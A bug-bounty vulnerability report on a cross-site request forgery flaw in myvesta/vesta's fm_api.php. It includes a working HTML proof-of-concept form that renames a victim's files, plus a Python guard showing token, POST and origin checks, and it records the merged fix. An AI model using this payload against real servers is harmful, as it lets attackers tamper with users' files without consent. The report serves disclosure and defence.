Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on Aug 24th 2021


✍️ Description

An attacker is able to rename any file on the server if a logged-in user visits the attacker's website.

🕵️‍♂️ Proof of Concept

Create a test.txt file under /home/user. While logged in, open this PoC.html in a browser; you can then check that test.txt has been renamed to test.php.


//PoC.html
<html>
<body>
<!-- rewrites the attacker page's URL bar so the user sees "/" instead of the PoC path -->
<script>history.pushState('', '', '/')</script>
<!-- no method attribute, so the browser submits this as a plain GET; the request
     carries the victim's session cookie but no anti-CSRF token, which is why
     fm_api.php cannot tell it apart from a request made by the file manager UI -->
<form action="https://demo.myvesta.com/file_manager/fm_api.php">
<input type="hidden" name="item" value="test&#46;php" />
<input type="hidden" name="target&#95;name" value="test&#46;txt" />
<input type="hidden" name="dir" value="&#47;home&#47;user&#47;" />
<input type="hidden" name="action" value="rename&#95;file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
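The PoC works because fm_api.php honours a state-changing action on nothing more than the session cookie. The guard below is an added example written for this report, not myvesta/vesta code: it models the three checks the endpoint would need (POST only, same-origin Origin/Referer, a per-session CSRF token) and runs them against a constructed request shaped like the form above and against a legitimate same-origin request. APP_ORIGIN is taken from the PoC's form action; the attacker origin, the csrf_token field name and the helper names are assumptions.

```python
"""CSRF guard for a file-manager action endpoint (added example, not vesta code).

Models the checks fm_api.php would need before honouring a rename_file request:
the action must arrive by POST, from the application's own origin, and carry a
per-session token that an attacker's page cannot read.
"""
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlparse

APP_ORIGIN = "https://demo.myvesta.com"  # assumed deployment origin, from the PoC's form action
# rename_file is the action in the report; any other state-changing action would join this set.
STATE_CHANGING_ACTIONS = {"rename_file"}


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) the per-session token that legitimate forms embed as csrf_token."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(headers: dict) -> Optional[str]:
    """Origin header wins; otherwise scheme+host of Referer; None if neither is present."""
    origin = headers.get("Origin")
    if origin:
        return origin
    referer = headers.get("Referer")
    if referer:
        u = urlparse(referer)
        if u.scheme and u.netloc:
            return f"{u.scheme}://{u.netloc}"
    return None


def check_request(method: str, headers: dict, params: dict, session: dict) -> Tuple[bool, str]:
    """Return (allowed, reason). headers/params stand in for the HTTP request,
    session for the server-side session of the logged-in user."""
    action = params.get("action", "")
    if action not in STATE_CHANGING_ACTIONS:
        return True, "read-only action"
    if method.upper() != "POST":
        return False, f"{action} must be sent with POST"
    origin = _origin_of(headers)
    if origin is None:
        return False, "missing Origin/Referer"
    if origin != APP_ORIGIN:
        return False, f"cross-site request from {origin}"
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed request matching the report's PoC form: a top-level GET navigation
# from the attacker's page, so no token and a foreign Referer (attacker origin is made up).
POC_REQUEST = dict(
    method="GET",
    headers={"Referer": "https://attacker.example/"},
    params={"item": "test.php", "target_name": "test.txt",
            "dir": "/home/user/", "action": "rename_file"},
)


def legit_request(session: dict) -> dict:
    """What the real file-manager page would send after being served the token."""
    return dict(
        method="POST",
        headers={"Origin": APP_ORIGIN},
        params={"item": "test.php", "target_name": "test.txt",
                "dir": "/home/user/", "action": "rename_file",
                "csrf_token": issue_csrf_token(session)},
    )


def demo() -> dict:
    """Evaluate the PoC request and a legitimate one against the same session."""
    session = {}
    issue_csrf_token(session)
    poc = check_request(POC_REQUEST["method"], POC_REQUEST["headers"], POC_REQUEST["params"], session)
    good = legit_request(session)
    ok = check_request(good["method"], good["headers"], good["params"], session)
    return {"poc": poc, "legit": ok}


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name}: {'ALLOWED' if allowed else 'BLOCKED'} ({reason})")
```

The token check is the one that actually closes the hole; the POST and origin checks are cheap defence in depth against the exact shape of the PoC (a tokenless GET from another site) and against deployments where a proxy strips or rewrites headers. Marking the session cookie SameSite=Lax would block the PoC's top-level GET as well, but not a cross-site POST, so it complements rather than replaces the token.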

💥 Impact

This vulnerability lets an attacker forge requests on behalf of an admin or user to rename or delete any file that user has access to.

💥 Test

Tested on Edge, Firefox, Chrome and Safari.

📍 Location

fm_api.php#L1

📝 References

csrf

We have contacted a member of the myvesta/vesta team and are waiting to hear back a month ago
Musio modified their report 25 days ago
myvesta validated this vulnerability 19 days ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 93de22 19 days ago
myvesta has been awarded the fix bounty